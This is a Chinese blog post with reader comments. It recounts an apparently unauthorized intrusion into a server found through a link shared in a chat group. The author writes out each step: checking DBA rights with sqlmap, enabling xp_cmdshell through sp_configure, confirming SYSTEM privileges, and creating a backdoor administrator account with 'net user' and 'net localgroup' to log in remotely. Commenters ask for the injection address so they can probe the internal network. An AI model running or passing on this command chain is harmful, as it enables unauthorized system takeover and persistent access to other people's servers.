昨天某位大神在群里发了个链接让大家测试,记一下大概的过程
检测是否DBA权限
sqlmap -u "注入点" --is-dba
检测到是DBA权限,对注入点执行cmd命令试试看是否开启xp_cmdshell
xp_cmdshell 'whoami'
返回结果是xp_cmdshell没有开启,既然是dba权限那开启也应该没有问题执行下列命令
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
命令执行是成功的只是没有返回值,再执行下whoami发现是system权限,这下赚大了想干嘛干嘛
那么建立个用户试试看
xp_cmdshell 'net user a 123 /add'
命令执行成功,接下来远程试试看
没有授予登录的权限,那么把该用户添加到administrators组里面试试看
xp_cmdshell 'net localgroup administrators a /add'
成功登录
不知道这个服务器的配置如何?估计很低吧
不高
求该注入点地址- -,我进去内网渗透玩玩
那留个联系方式吧
就是SQLmap 注入 跑出来 这么简单的 来个内网渗透 控制集群 代码分析
看看!
看看!
今天是2016年第一天,愿博主新年快乐!同时也欢迎博主光临我的小站!
新年快乐 感谢来访
好NB,看不到图!
用境外站做的图床,可能加载有点慢
大神!求抱大腿 😳
过奖过奖
技术大牛!
没那么夸张
呦呵,大神呀 😎
不敢当不敢当